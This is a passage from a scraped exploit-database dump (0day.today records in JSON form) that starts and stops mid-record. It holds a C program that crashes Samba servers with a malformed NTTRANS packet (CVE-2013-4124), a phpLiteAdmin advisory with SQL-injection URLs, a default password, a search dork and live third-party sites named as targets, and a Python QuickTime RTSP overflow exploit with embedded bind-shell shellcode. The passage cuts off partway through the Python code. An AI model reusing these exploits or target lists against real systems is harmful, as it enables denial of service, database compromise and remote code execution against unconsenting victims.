34), cn, 34);\r\n \r\n write(fd, packet, sizeof (packet));\r\n close(fd);\r\n \r\n free(cn);\r\n free(sn);\r\n}\r\n \r\nvoid process_nbt_session_reply(int fd)\r\n{ struct nbt_session_header nbt_hdr;\r\n char *errormsg;\r\n uint8 errorcode;\r\n int size, len = 0;\r\n \r\n if ((size = read(fd, &nbt_hdr, sizeof (nbt_hdr))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n if (size != sizeof (nbt_hdr))\r\n { close(fd);\r\n fprintf(stderr, \"read() a broken packet, aborting.\\n\"); \r\n exit(-1);\r\n }\r\n memcpy(&len, &nbt_hdr.len, sizeof (uint16));\r\n \r\n if (len)\r\n { read(fd, (void *)&errorcode, 1); \r\n close(fd);\r\n switch (errorcode)\r\n { case 0x80 : errormsg = \"Not listening on called name\"; break;\r\n case 0x81 : errormsg = \"Not listening for calling name\"; break;\r\n case 0x82 : errormsg = \"Called name not present\"; break;\r\n case 0x83 : errormsg = \"Called name present, but insufficient resources\"; break;\r\n case 0x8f : errormsg = \"Unspecified error\"; break;\r\n default : errormsg = \"Unspecified error (unknown error code received!)\"; break;\r\n }\r\n fprintf(stderr, \"session request denied, reason: '%s' (code %i)\\n\", errormsg, errorcode);\r\n exit(-1);\r\n }\r\n printf(\"session request granted\\n\");\r\n}\r\n \r\nvoid negprot_request(int fd)\r\n{ struct variable_data_header data;\r\n char dialects[] = \"\\x2PC NETWORK PROGRAM 1.0\\x0\\x2MICROSOFT NETWORKS 1.03\\x0\\x2MICROSOFT NETWORKS 3.0\\x0\\x2LANMAN1.0\\x0\" \\\r\n \"\\x2LM1.2X002\\x0\\x2Samba\\x0\\x2NT LANMAN 1.0\\x0\\x2NT LM 0.12\\x0\\x2\"\"FLATLINE'S KWAADWAAR\"; \r\n char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data) + sizeof (dialects)];\r\n int dlen = htons(sizeof (dialects));\r\n \r\n memset(&data, '\\0', sizeof (data));\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n pid = getpid();\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NEGPROT, 8, 1, 0, pid, 0, 1);\r\n \r\n memcpy(&data.bytecount, &dlen, sizeof (uint16));\r\n \r\n memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)), &data, sizeof (data));\r\n memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data)), \r\n dialects, sizeof (dialects));\r\n \r\n if (write(fd, packet, sizeof (packet)) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n}\r\n \r\nvoid process_negprot_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct negprot_reply_header *np_reply_hdr;\r\n char packet[1024];\r\n int size;\r\n uint16 pid_reply;\r\n \r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));\r\n np_reply_hdr = (struct negprot_reply_header *)(packet + (sizeof (struct nbt_session_header) + \r\n sizeof (struct smb_base_header)));\r\n \r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n \r\n memcpy(&pid_reply, &base_hdr->pid, sizeof (uint16));\r\n memcpy(&sessionid, &np_reply_hdr->sessionid, sizeof (uint32));\r\n if (base_hdr->command != SMB_NEGPROT || np_reply_hdr->wordcount != 17 || pid_reply != pid)\r\n { close(fd);\r\n fprintf(stderr, \"protocol negotiation failed\\n\");\r\n exit(-1);\r\n }\r\n \r\n printf(\"protocol negotiation complete\\n\");\r\n}\r\n \r\nvoid sesssetupx_request(int fd)\r\n{ uint8 data[] = \"\\x12\\x0\\x0\\x0\\x55\\x6e\\x69\\x78\\x00\\x53\\x61\\x6d\\x62\\x61\";\r\n char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + \r\n sizeof (struct sesssetupx_request_header) + sizeof (data)];\r\n int size;\r\n \r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_SESSSETUPX, 8, 1, 0, pid, 0, 1);\r\n construct_sesssetupx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + \r\n sizeof (struct sesssetupx_request_header), &data, sizeof (data));\r\n \r\n if ((size = write(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n if (size != sizeof (packet))\r\n { close(fd);\r\n fprintf(stderr, \"couldn't write entire packet, aborting!\\n\");\r\n exit(-1);\r\n }\r\n}\r\n \r\nvoid process_sesssetupx_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct sesssetupx_reply_header *sx_hdr;\r\n char packet[1024];\r\n int size, len;\r\n \r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n \r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));\r\n sx_hdr = (struct sesssetupx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n \r\n memcpy(&len, &nbt_hdr->len, sizeof (uint16));\r\n memcpy(&uid, &base_hdr->uid, sizeof (uint16));\r\n \r\n if (sx_hdr->xcommand != 0xff && sx_hdr->wordcount != 3)\r\n { close(fd);\r\n fprintf(stderr, \"session setup failed\\n\");\r\n exit(-1);\r\n }\r\n \r\n printf(\"session setup complete, got assigned uid %i\\n\", uid);\r\n}\r\n \r\nvoid tconx_request(int fd)\r\n{ \r\n char *packet;\r\n int size, pktsize = sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) +\r\n sizeof (struct tconx_request_header) + strlen(tconx_servername) + 15;\r\n \r\n if ((packet = malloc(pktsize)) == NULL)\r\n { close(fd);\r\n fprintf(stderr, \"malloc() failed, aborting!\\n\");\r\n exit(-1);\r\n }\r\n \r\n construct_nbt_session_header(packet, SMB_SESSION, 0, pktsize - sizeof (struct nbt_session_header));\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_TCONX, 8, 1, 0, pid, uid, 1);\r\n construct_tconx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n \r\n if ((size = write(fd, packet, pktsize)) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n \r\n free(packet);\r\n \r\n if (size != pktsize)\r\n { close(fd);\r\n fprintf(stderr, \"couldn't write entire packet, aborting!\\n\");\r\n exit(-1);\r\n } \r\n}\r\n \r\nvoid process_tconx_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct tconx_reply_header *tx_hdr;\r\n char packet[1024];\r\n int size, bytecount;\r\n \r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno);\r\n exit(-errno);\r\n }\r\n \r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));\r\n tx_hdr = (struct tconx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n \r\n memcpy(&tid, &base_hdr->tid, sizeof (uint16));\r\n memcpy(&bytecount, &tx_hdr->bytecount, sizeof (uint16));\r\n \r\n printf(\"tree connect complete, got assigned tid %i\\n\", tid);\r\n}\r\n \r\nvoid nttrans_request(int fd) { \r\n // packet = nbt session header + smb base header + nttrans header!\r\n char packet[sizeof (struct nbt_session_header) + \r\n sizeof (struct smb_base_header) + \r\n sizeof (struct nttrans_primary_request_header)];\r\n struct nttrans_primary_request_header nttrans_hdr; // nttrans header!\r\n int size=0;\r\n int function = SMB_NTTRANSCREATE; // NTTRANSCREATE!\r\n int totalparamcount = TOTALCOUNT;\r\n int totaldatacount = 0;\r\n uint8 setupcount = 0;\r\n \r\n memset(&nttrans_hdr, 0, sizeof nttrans_hdr);\r\n \r\n // construct nbt session header\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n // construct smb base header\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NTTRANS, 8, 1, tid, pid, uid, 1);\r\n \r\n // construct nttrans header\r\n nttrans_hdr.paramoffset[0] = '\\x00';\r\n nttrans_hdr.paramoffset[1] = '\\x00';\r\n nttrans_hdr.paramoffset[2] = '\\x10';\r\n nttrans_hdr.paramoffset[3] = '\\xff';\r\n nttrans_hdr.dataoffset[0] = '\\x00'; // XXX data offset 0xff100000 to integer wrap\r\n nttrans_hdr.dataoffset[1] = '\\x00'; // the offset exploits the security bug of CVE-2013-4124\r\n nttrans_hdr.dataoffset[2] = '\\x10'; // samba remote dos\r\n nttrans_hdr.dataoffset[3] = '\\xff';\r\n \r\n nttrans_hdr.wordcount = 19 + setupcount;\r\n memcpy(&nttrans_hdr.function, &function, sizeof (uint16));\r\n memcpy(&nttrans_hdr.totalparamcount, &totalparamcount, sizeof (uint32));\r\n memcpy(&nttrans_hdr.totaldatacount, &totaldatacount, sizeof (uint32));\r\n memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header), &nttrans_hdr, sizeof nttrans_hdr);\r\n \r\n // send samba packet!\r\n size = write(fd, packet, sizeof (packet));\r\n close(fd);\r\n \r\n}\r\n \r\nstatic char banner[]={\r\n\" ___ ___ \\n\" \\\r\n\" / _ \\\\ / _ \\\\ \\n\" \\\r\n\" __ __| (_) || | | | ___ \\n\" \\\r\n\" \\\\ \\\\/ / \\\\__. || | | | / __| \\n\" \\\r\n\" > < / / | |_| || (__ \\n\" \\\r\n\" /_/\\\\_\\\\ /_/ \\\\___/ \\\\___| \\n\" \\\r\n};\r\n \r\nint main(int argc, char *argv[]) {\r\n int fd;\r\n struct sockaddr_in s_in;\r\n char target_ip[16];\r\n int smb_port=139;\r\n \r\n \r\n printf(\"%s\\n\\nsamba nttrans reply exploit\\n\\n\", banner);\r\n \r\n if(argc < 2){\r\n fprintf(stderr, \"samba nttrans reply exploit Usage:\\n\\n./samba_exploit [target ip addr]\\n\\n\");\r\n exit(-1);\r\n }\r\n \r\n strncpy(target_ip, argv[1], 16);\r\n \r\n memset(&s_in, 0, sizeof (s_in));\r\n s_in.sin_family = AF_INET;\r\n s_in.sin_port = htons(smb_port); // samba port=139/tcp\r\n s_in.sin_addr.s_addr = inet_addr(target_ip);\r\n \r\n fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n connect(fd, (struct sockaddr *)&s_in, sizeof (s_in));\r\n \r\n // nbt(netbios over tcpip, nbtstat) session request\r\n nbt_session_request(fd, \"BOSSA\", \"SAMBA\"); // adjust computer names(clientname, servername)\r\n process_nbt_session_reply(fd);\r\n \r\n // protocol negotiation\r\n negprot_request(fd);\r\n process_negprot_reply(fd);\r\n \r\n // session setup\r\n sesssetupx_request(fd); // setup request\r\n process_sesssetupx_reply(fd); // setup reply\r\n \r\n // tree connection setup\r\n tconx_request(fd);\r\n process_tconx_reply(fd);\r\n \r\n // exploit!\r\n printf(\"[*] nttrans reply exploit!\\n\");\r\n nttrans_request(fd);\r\n \r\n close(fd);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-06] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21146"}, {"lastseen": "2018-01-02T21:10:38", "bulletinFamily": "exploit", "description": "phpLiteAdmin is suffer from multiple vulnerabilities / bugs in \rv1.8.x to-> 1.9.x , the attacker can use some bug in the Script\rto inject some remote SQL command/code , and Disclosure the Full Path.\r> Bugs : \rAuthentication Bypass\rSQL Injection/Exec\rFull Path Disclosure", "modified": "2013-01-15T00:00:00", "published": "2013-01-15T00:00:00", "id": "1337DAY-ID-20185", "href": "https://0day.today/exploit/description/20185", "type": "zdt", "title": "phpLiteAdmin v1.8.x->1.9.x (SQLi/FD) <= Multiple Vulnerabilities", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : 1337day.com 0\r\n1 [+] Support e-mail : submit[at]1337day.com 1\r\n0 0\r\n1 ######################################### 1\r\n0 I'm KedAns-Dz member from Inj3ct0r Team 1\r\n1 ######################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n \r\n###\r\n# Title : phpLiteAdmin v1.8.x->1.9.x (SQLi/FD) <= Multiple Vulnerabilities\r\n# Author : KedAns-Dz\r\n# E-mail : ked-h (@hotmail.com / @1337day.com)\r\n# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)\r\n# Web Site : www.1337day.com .net .org\r\n# FaCeb0ok : http://fb.me/Inj3ct0rK3d\r\n# TwiTter : @kedans\r\n# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com\r\n# Type : proof of concept - webapp 0day - remote - php\r\n# Tested on : Windows7\r\n# Download : [http://phpliteadmin.googlecode.com]\r\n###\r\n\r\n# <3 <3 Greetings t0 Palestine <3 <3\r\n# F-ck HaCking, Lov3 Explo8ting !\r\n\r\n######## [ Proof / Exploit ] ################|=>\r\n\r\n# Google Dork :\r\n# allintext:\"Powered by phpLiteAdmin | \"\r\n\r\n##################\r\n# [!] Description:\r\n------------------\r\nphpLiteAdmin is suffer from multiple vulnerabilities / bugs in \r\nv1.8.x to-> 1.9.x , the attacker can use some bug in the Script\r\nto inject some remote SQL command/code , and Disclosure the Full Path.\r\n# Bugs :\r\n#------- \r\n# Authentication Bypass\r\n# SQL Injection/Exec\r\n# Full Path Disclosure\r\n#######################\r\n\r\n#### (1) Authentication Bypass :\r\n--------------------------------\r\n\r\n [!] php-code :\r\nline 38->39 :::::::::::::::::\r\n//password to gain access\r\n$password = \"admin\";\r\n:::::::::::::::::::::::::::::\r\n\r\n- not affected on all targets, just change the password to fix it\r\n\r\n [+] http://[target]/[path]/phpliteadmin.php\r\n [*] password : admin\r\n\r\n#### (2) Full Path Disclosure :\r\n-------------------------------\r\n \r\n [+] http://[target]/[path]/phpliteadmin.php?view=import\r\n [!] & Import File with (NULL/Bad) Content =>\r\n- you get some sql error msg with the full path of phpliteadmin.php\r\n\r\nex: '-------------\r\nWarning: PDO::exec(): SQLSTATE[HY000]: General error: \r\ntrying to execute an empty query in C:\\Program Files\\EasyPHP-12.1\\www\\phpliteadmin.php on line 987\r\n____________________________________\r\n\r\nWarning: SQLiteDatabase::queryExec() [sqlitedatabase.queryexec]: Cannot execute empty query. \r\nin /homepages/20/d421371141/htdocs/pauleschoen.com/cgi-bin/phpliteadmin.php on line 646\r\n------------------'\r\n\r\n proof image (http://i46.tinypic.com/ddmek5.png) # in local test\r\n proof image (http://i49.tinypic.com/juepet.png) # in remote test\r\n \r\n#### (3) SQL Injection :\r\n------------------------\r\n\r\nphp-code ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\r\n$query = \"SELECT * FROM \".$db->quote_id($_GET['table']).\" WHERE ROWID = \".$pks[$j];\r\n:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\r\n\r\n [+] http://[target]/[path]/phpliteadmin.php?action=row_view&table='\r\n [&] http://[target]/[path]/phpliteadmin.php?action=row_view&table=' [ SQLi ]\r\n\r\n proof image (http://i46.tinypic.com/102p750.png)\r\n \r\n#### (4) Exec SQL code :\r\n------------------------\r\n \r\nGo to :\r\n [*] http://[target]/[path]/phpliteadmin.php?view=sql\r\n \r\n-& put the SQL Code in the text-area (Run SQL query/queries :)\r\nand click 'GO' to exec ;) .\r\n\r\n## DeMo's :\r\n\r\nhttp://www.pauleschoen.com/cgi-bin/phpliteadmin.php\r\nhttp://urp.caezar.net/php/ThemeFrame/phpliteadmin.php\r\nhttp://www.dbcreator.co.uk/pla3.php\r\n\r\n!+ Find More targets in Google ^_^\r\n\r\n# ThnX 2 (Jusqua la Morts) :D\r\n\r\n#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================\r\n# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem\r\n# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,\r\n# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)\r\n# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection\r\n# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all\r\n# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD\r\n# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs\r\n#============================================================================================================\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/20185"}, {"lastseen": "2018-03-14T00:20:18", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category remote exploits", "modified": "2007-11-26T00:00:00", "published": "2007-11-26T00:00:00", "id": "1337DAY-ID-9072", "href": "https://0day.today/exploit/description/9072", "type": "zdt", "title": "Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)", "sourceData": "======================================================================\r\nApple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera) \t\r\n======================================================================\r\n\r\n#!/usr/bin/python\r\n##########################################################################\r\n# http://www.offensive-security.com\r\n# Bug discovered by Krystian Kloskowski (h07) <[email\u00a0protected]>\r\n# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista\r\n# This exploit is completely \"Universal\" .... It has also been modded to work via url redirection ... \r\n# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....\r\n# re-edited by muts and javaguru1999 to annoy Symantec\r\n# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html\r\n# there IS NO SPOON!\r\n########################################################################## \r\n# \"With Internet Explorer versions 6 and 7, and the Safari 3 beta, \r\n# the attack appears to be prevented because standard buffer overflow \r\n# prevention processes act before any damage can be done, Florio wrote. \r\n# With Firefox, the QuickTime RTSP response is unmoderated. As a result, \r\n# the exploit works against Firefox if QuickTime is the default multimedia player, \r\n# according to Florio.\"\r\n##########################################################################\r\n# Calling Quicktime via URL kicks in an Extra Exception Handler, \r\n# of which we have no control over.\r\n# By making the buffer larger than the original exploit, we can overwrite \r\n# the last exception handler, and regain control over execution.\r\n# This is indeed an evil exploit - muhaha.\r\n##########################################################################\r\n \r\nfrom socket import *\r\n \r\nheader = (\r\n'RTSP/1.0 200 OK\\r\\n'\r\n'CSeq: 1\\r\\n'\r\n'Date: 0x00 :P\\r\\n'\r\n'Content-Base: rtsp://0.0.0.0/1.mp3/\\r\\n'\r\n'Content-Type: %s\\r\\n' # <-- overflow\r\n'Content-Length: %d\\r\\n'\r\n'\\r\\n')\r\n \r\nbody = (\r\n'v=0\\r\\n'\r\n'o=- 16689332712 1 IN IP4 0.0.0.0\\r\\n'\r\n's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\\r\\n'\r\n'i=1.mp3\\r\\n'\r\n't=0 0\\r\\n'\r\n'a=tool:ciamciaramcia\\r\\n'\r\n'a=type:broadcast\\r\\n'\r\n'a=control:*\\r\\n'\r\n'a=range:npt=0-213.077\\r\\n'\r\n'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\\r\\n'\r\n'a=x-qt-text-inf:1.mp3\\r\\n'\r\n'm=audio 0 RTP/AVP 14\\r\\n'\r\n'c=IN IP4 0.0.0.0\\r\\n'\r\n'a=control:track1\\r\\n'\r\n)\r\n \r\n# ExitProcess shellcode will kill browser, but keep the shell open\r\n \r\nshellcode =(# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x37\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x42\"\r\n\"\\x58\\x50\\x30\\x42\\x31\\x41\\x42\\x6b\\x42\\x41\\x52\\x32\\x42\\x42\\x32\\x41\"\r\n\"\\x41\\x30\\x41\\x41\\x58\\x42\\x50\\x38\\x42\\x42\\x75\\x39\\x79\\x4b\\x4c\\x61\"\r\n\"\\x7a\\x38\\x6b\\x50\\x4d\\x68\\x68\\x69\\x69\\x4b\\x4f\\x4b\\x4f\\x59\\x6f\\x53\"\r\n\"\\x50\\x4e\\x6b\\x32\\x4c\\x44\\x64\\x35\\x74\\x6e\\x6b\\x30\\x45\\x57\\x4c\\x4e\"\r\n\"\\x6b\\x41\\x6c\\x64\\x45\\x51\\x68\\x46\\x61\\x4a\\x4f\\x6c\\x4b\\x30\\x4f\\x46\"\r\n\"\\x78\\x6c\\x4b\\x71\\x4f\\x47\\x50\\x33\\x31\\x5a\\x4b\\x61\\x59\\x6e\\x6b\\x50\"\r\n\"\\x34\\x4e\\x6b\\x46\\x61\\x78\\x6e\\x50\\x31\\x69\\x50\\x4e\\x79\\x4e\\x4c\\x4b\"\r\n\"\\x34\\x6b\\x70\\x52\\x54\\x63\\x37\\x38\\x41\\x6a\\x6a\\x44\\x4d\\x63\\x31\\x6b\"\r\n\"\\x72\\x68\\x6b\\x49\\x64\\x77\\x4b\\x30\\x54\\x41\\x34\\x45\\x78\\x52\\x55\\x69\"\r\n\"\\x75\\x6e\\x6b\\x73\\x6f\\x75\\x74\\x56\\x61\\x7a\\x4b\\x33\\x56\\x4e\\x6b\\x36\"\r\n\"\\x6c\\x72\\x6b\\x4c\\x4b\\x53\\x6f\\x35\\x4c\\x77\\x71\\x38\\x6b\\x47\\x73\\x44\"\r\n\"\\x6c\\x6e\\x6b\\x4b\\x39\\x32\\x4c\\x35\\x74\\x77\\x6c\\x65\\x31\\x69\\x53\\x56\"\r\n\"\\x51\\x49\\x4b\\x65\\x34\\x4e\\x6b\\x67\\x33\\x34\\x70\\x4c\\x4b\\x77\\x30\\x74\"\r\n\"\\x4c\\x6e\\x6b\\x64\\x30\\x47\\x6c\\x4c\\x6d\\x6e\\x6b\\x41\\x50\\x63\\x38\\x53\"\r\n\"\\x6e\\x70\\x68\\x4e\\x6e\\x62\\x6e\\x56\\x6e\\x38\\x6c\\x52\\x70\\x6b\\x4f\\x7a\"\r\n\"\\x76\\x72\\x46\\x61\\x43\\x43\\x56\\x52\\x48\\x77\\x43\\x64\\x72\\x51\\x78\\x71\"\r\n\"\\x67\\x50\\x73\\x70\\x32\\x71\\x4f\\x31\\x44\\x4b\\x4f\\x4a\\x70\\x75\\x38\\x78\"\r\n\"\\x4b\\x68\\x6d\\x49\\x6c\\x75\\x6b\\x46\\x30\\x4b\\x4f\\x79\\x46\\x53\\x6f\\x6f\"\r\n\"\\x79\\x38\\x65\\x73\\x56\\x4c\\x41\\x58\\x6d\\x64\\x48\\x65\\x52\\x72\\x75\\x32\"\r\n\"\\x4a\\x73\\x32\\x49\\x6f\\x4a\\x70\\x33\\x58\\x78\\x59\\x63\\x39\\x39\\x65\\x4c\"\r\n\"\\x6d\\x72\\x77\\x6b\\x4f\\x6e\\x36\\x50\\x53\\x52\\x73\\x51\\x43\\x70\\x53\\x33\"\r\n\"\\x63\\x71\\x53\\x63\\x63\\x61\\x53\\x33\\x63\\x4b\\x4f\\x5a\\x70\\x73\\x56\\x51\"\r\n\"\\x78\\x37\\x61\\x41\\x4c\\x50\\x66\\x53\\x63\\x6c\\x49\\x5a\\x41\\x5a\\x35\\x51\"\r\n\"\\x78\\x4d\\x74\\x67\\x6a\\x30\\x70\\x4b\\x77\\x66\\x37\\x79\\x6f\\x4b\\x66\\x41\"\r\n\"\\x7a\\x32\\x30\\x72\\x71\\x33\\x65\\x59\\x6f\\x38\\x50\\x70\\x68\\x6f\\x54\\x6e\"\r\n\"\\x4d\\x64\\x6e\\x38\\x69\\x32\\x77\\x4b\\x4f\\x4e\\x36\\x51\\x43\\x41\\x45\\x39\"\r\n\"\\x6f\\x4a\\x70\\x71\\x78\\x4a\\x45\\x71\\x59\\x6d\\x56\\x43\\x79\\x76\\x37\\x4b\"\r\n\"\\x4f\\x39\\x46\\x52\\x70\\x72\\x74\\x46\\x34\\x31\\x45\\x4b\\x4f\\x68\\x50\\x4e\"\r\n\"\\x73\\x43\\x58\\x6b\\x57\\x71\\x69\\x6f\\x36\\x53\\x49\\x76\\x37\\x6b\\x4f\\x38\"\r\n\"\\x56\\x71\\x45\\x6b\\x4f\\x48\\x50\\x35\\x36\\x70\\x6a\\x31\\x74\\x45\\x36\\x31\"\r\n\"\\x78\\x62\\x43\\x32\\x4d\\x6f\\x79\\x7a\\x45\\x71\\x7a\\x30\\x50\\x33\\x69\\x46\"\r\n\"\\x49\\x6a\\x6c\\x6b\\x39\\x6a\\x47\\x73\\x5a\\x51\\x54\\x6f\\x79\\x6d\\x32\\x30\"\r\n\"\\x31\\x59\\x50\\x38\\x73\\x4d\\x7a\\x59\\x6e\\x43\\x72\\x36\\x4d\\x69\\x6e\\x73\"\r\n\"\\x72\\x54\\x6c\\x6f\\x63\\x4c\\x4d\\x72\\x5a\\x74\\x78\\x4c\\x6b\\x6c\\x6b\\x6e\"\r\n\"\\x4b\\x35\\x38\\x50\\x72\\x6b\\x4e\\x4c\\x73\\x64\\x56\\x4b\\x4f\\x43\\x45\\x32\"\r\n\"\\x64\\x79\\x6f\\x7a\\x76\\x33\\x6b\\x32\\x77\\x62\\x72\\x63\\x61\\x33\\x61\\x30\"\r\n\"\\x51\\x30\\x6a\\x53\\x31\\x71\\x41\\x46\\x31\\x52\\x75\\x32\\x71\\x6b\\x4f\\x4e\"\r\n\"\\x30\\x70\\x68\\x4e\\x4d\\x7a\\x79\\x46\\x65\\x4a\\x6e\\x72\\x73\\x69\\x6f\\x58\"\r\n\"\\x56\\x72\\x4a\\x69\\x6f\\x69\\x6f\\x66\\x57\\x39\\x6f\\x58\\x50\\x4c\\x4b\\x41\"\r\n\"\\x47\\x6b\\x4c\\x6c\\x43\\x4f\\x34\\x32\\x44\\x4b\\x4f\\x68\\x56\\x76\\x32\\x4b\"\r\n\"\\x4f\\x4e\\x30\\x71\\x78\\x33\\x4e\\x6a\\x78\\x49\\x72\\x43\\x43\\x61\\x43\\x4b\"\r\n\"\\x4f\\x48\\x56\\x69\\x6f\\x6a\\x70\\x42\")\r\n \r\ntmp = \"A\" * 987\r\ntmp +=\"\\xeb\\x20\\x90\\x90\" # short jump for 7.2\r\ntmp +=\"\\xeb\\x20\\x9c\\x66\" # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3\r\ntmp +=\"\\x4e\\x28\\x86\\x66\" # 6686284e | pop pop ret for 7.3\r\ntmp += \"\\x90\" * 92\r\ntmp += shellcode\r\ntmp += \"\\x41\" * int(30000-len(shellcode)) # play with this buffer if you still get exceptions. \r\n \r\nheader %= (tmp, len(body))\r\nevil = header + body\r\n \r\ns = socket(AF_INET, SOCK_STREAM)\r\ns.bind((\"0.0.0.0\", 554))\r\ns.listen(1)\r\nprint \"[+] Listening on [RTSP] 554\"\r\nc, 